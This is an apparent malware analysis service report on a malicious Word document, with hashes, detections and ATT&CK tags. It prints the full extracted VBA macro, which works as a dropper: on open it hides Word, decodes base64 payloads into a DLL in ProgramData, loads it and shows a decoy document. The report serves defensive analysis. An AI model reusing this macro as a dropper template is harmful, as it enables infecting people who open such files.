Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 8e6fb36ef98a33ad…

MALICIOUS

Office (OOXML)

5.96 MB Created: 2020-04-13 18:42:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-09-15
MD5: 9c703b1f9337fc960dd6029d2c3e156d SHA-1: b5c3dc058d981565044b9af9472be5f3fe468086 SHA-256: 8e6fb36ef98a33ad35f0d3a15f602bb4263441722725cd78fd0257a8d1911ef3
130 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an OOXML document containing VBA macros, specifically an AutoOpen macro that uses CreateObject to execute code. This indicates a malicious intent to run a payload upon opening. The ClamAV detection of 'Win.Malware.Agent-9377935-0' further supports its malicious nature. The VBA code appears to be a downloader, though the full functionality is truncated.

Heuristics 5

  • ClamAV: Win.Malware.Agent-9377935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Malware.Agent-9377935-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        On Error Resume Next
    MkDir = CreateObject("Scripting.FileSystemObject").CreateFolder(szDir)
End Function
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
    On Error Resume Next
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 4940 bytes
SHA-256: 77d45b0141bd7a795f3dbff79e40883c71bb6e18858c8569e8b91a4e33a7cb4c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{24EB0050-0770-46C1-A2AC-6F306BCE3A0F}{6B65F2B2-A60C-413B-9F79-9615F83E3240}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Label4_Click()

End Sub

Private Sub Label5_Click()

End Sub

Attribute VB_Name = "Module1"
Private Declare PtrSafe Function BZ2_bzInit Lib "desktop.dat" (ByVal lpDocPath As String, ByVal lpPass As String, ByVal lpUID As String) As Long
Private Declare PtrSafe Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As LongPtr

Function MkDir(szDir)
    On Error Resume Next
    MkDir = CreateObject("Scripting.FileSystemObject").CreateFolder(szDir)
End Function

Function FileExist(szFile)
    On Error Resume Next
    FileExist = CreateObject("Scripting.FileSystemObject").FileExists(szFile)
End Function

Function FolderExist(szFolder)
    On Error Resume Next
    FolderExist = CreateObject("Scripting.FileSystemObject").FolderExists(szFolder)
End Function

Function Stream_BinaryToString(Binary)
    On Error Resume Next
    
    Const adTypeText = 2
    Const adTypeBinary = 1
    Dim BinaryStream
    Set BinaryStream = CreateObject("ADODB.Stream")
    BinaryStream.Type = adTypeBinary
    BinaryStream.Open
    BinaryStream.Write Binary
    BinaryStream.Position = 0
    BinaryStream.Type = adTypeText
    BinaryStream.Charset = "us-ascii"
    Stream_BinaryToString = BinaryStream.ReadText
    Set BinaryStream = Nothing
End Function

Function Base64DecodeToBinary(ByVal vCode)
    On Error Resume Next

    Dim oXML, oNode
    Set oXML = CreateObject("Msxml2.DOMDocument.3.0")
    Set oNode = oXML.CreateElement("base64")
    oNode.dataType = "bin.base64"
    oNode.Text = vCode
    Base64DecodeToBinary = oNode.nodeTypedValue
    Set oNode = Nothing
    Set oXML = Nothing
End Function

Function Base64DecodeToString(ByVal vCode)
    On Error Resume Next

    Dim oXML, oNode
    Set oXML = CreateObject("Msxml2.DOMDocument.3.0")
    Set oNode = oXML.CreateElement("base64")
    oNode.dataType = "bin.base64"
    oNode.Text = vCode
    Base64DecodeToString = Stream_BinaryToString(oNode.nodeTypedValue)
    Set oNode = Nothing
    Set oXML = Nothing
End Function

Sub ExtractDll(dllPath)
    On Error Resume Next

    Set objStream = CreateObject("ADODB.Stream")
    objStream.Type = 1
    objStream.Open
#If Win64 Then
    objStream.Write Base64DecodeToBinary(Base64DecodeToString(Base64DecodeToString(UserForm1.TextBox1.Text)))
#Else
    objStream.Write Base64DecodeToBinary(Base64DecodeToString(Base64DecodeToString(UserForm1.TextBox2.Text)))
#End If
    objStream.SaveToFile dllPath, 2
    Set objStream = Nothing
End Sub

Sub ExtractDoc(docPath)
    On Error Resume Next

    Set objStream = CreateObject("ADODB.Stream")
    objStream.Type = 1
    objStream.Open
    objStream.Write Base64DecodeToBinary(Base64DecodeToString(Base64DecodeToString(UserForm1.TextBox3.Text)))
    objStream.SaveToFile docPath, 2
    Set objStream = Nothing
End Sub

Function GetDocName() As String
    On Error Resume Next
    
    strDocTag = " .doc"

    curDocNameFull = ActiveDocument.Path & "\" & ActiveDocument.Name
    curDocName = Left(curDocNameFull, InStrRev(curDocNameFull, ".") - 1)
    newDocNameFull = curDocName & strDocTag
    Do While FileExist(newDocNameFull)
        curDocName = curDocName & " "
        newDocNameFull = curDocName & strDocTag
    Loop
    GetDocName = newDocNameFull
End Function

Function CreateWordDocument(filePath)
    On Error Resume Next
    
    Dim objDocApp
    Set objDocApp = CreateObject("Word.Application")
    objDocApp.Visible = True
    objDocApp.Documents.Open filePath
    
    CreateWordDocument = 1
End Function

Function GetOrgDocPath()
    GetOrgDocPath = ActiveDocument.Path & "\" & ActiveDocument.Name
End Function

Function GetDllName() As String
    On Error Resume Next
    
    GetDllName = "C:\ProgramData\desktop.dat"
End Function

Sub AutoOpen()
    On Error Resume Next

    Application.Visible = False

    dllPath = GetDllName()
    docPath = GetDocName()
    orgDocPath = GetOrgDocPath()

    ExtractDll (dllPath)
    ExtractDoc (docPath)
    
    LoadLibraryA (dllPath)

    a = BZ2_bzInit(orgDocPath, "S-2-20-8798-18246938-238138-0443", "510")
    
    b = CreateWordDocument(docPath)

    Application.Quit (wdDoNotSaveChanges)

End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 8388608 bytes
SHA-256: a94bfd7fad9ff28fa2fc6fa37461897d480bd389b38b3735735bde848ae35a50
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.